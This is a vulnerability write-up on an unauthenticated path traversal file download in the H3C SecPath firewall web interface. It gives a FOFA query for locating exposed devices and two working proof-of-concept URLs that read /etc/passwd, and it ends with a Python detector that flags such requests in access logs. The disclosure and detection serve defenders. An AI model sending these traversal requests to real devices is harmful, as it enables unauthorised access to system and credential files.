# H3C SecPath Next-Generation Firewall Arbitrary File Download Vulnerability

### Vulnerability Description

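The H3C SecPath next-generation firewall has functionality that leads to an arbitrary file download vulnerability. An attacker can use the vulnerability to obtain sensitive information.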

### Affected Products

H3C SecPath

### FOFA

title="Web user login"

### Vulnerability Reproduction

The login page looks like this:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-Mhr--nRfhXd-5OPHtqJ%2Fimage.png?alt=media\&token=11e95bce-95c6-4161-9692-02699b112858)

Two functions contain the vulnerability:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-Mhr-2TjYQvumNWtr_38%2Fimage.png?alt=media\&token=e1f3f98f-85cd-4747-8b08-6d0defa608f5)

Click download, capture the request, and modify it:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-Mhr-5Y8-tORwhAmjz1k%2Fimage.png?alt=media\&token=8e3b164f-3886-416d-b6a3-15e811365594)

In addition, sensitive files can also be requested and downloaded without authentication.

Verification PoC

```
/webui/?g=sys_dia_data_check&file_name=../../etc/passwd

/webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd
```
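
To check whether a device has received requests of this shape, the web access logs in front of the management interface can be searched for the two handlers with a traversal value in their file parameter. The following Python detection logic is an added example, not part of the original write-up. It assumes combined-format access logs (the appliance's own log format is not shown on this page), and the sample lines and addresses are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Handler name -> parameter carrying the file name (both taken from the PoC above).
HANDLERS = {"sys_dia_data_check": "file_name", "sys_capture_file_download": "name"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (/webui/?\?\S*) HTTP/[\d.]+"')


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e) a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(path):
    """True when a file name leaves its directory via '..' segments or an absolute path."""
    norm = fully_decode(path).replace("\\", "/")
    return norm.startswith("/") or ".." in norm.split("/")


def suspicious_requests(log_lines):
    """Return (line_no, handler, decoded_value) for traversal values sent to the two handlers."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        handler = query.get("g", [""])[0]
        param = HANDLERS.get(handler)
        for value in query.get(param, []) if param else []:
            if is_traversal(value):
                hits.append((no, handler, fully_decode(value)))
    return hits


# Constructed sample log lines (combined log format assumed; documentation address ranges).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /webui/?g=sys_dia_data_check&file_name=../../etc/passwd HTTP/1.1" 200 1024',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /webui/?g=sys_capture_file_download&name=%252e%252e%2f%252e%252e%2fetc%2fpasswd HTTP/1.1" 200 1024',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /webui/?g=sys_capture_file_download&name=capture01.pcap HTTP/1.1" 200 20480',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /webui/?g=login HTTP/1.1" 200 512',
]
```

Calling `suspicious_requests(SAMPLE)` flags the first two lines, including the double-encoded one, and leaves the ordinary capture download and the login request alone.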

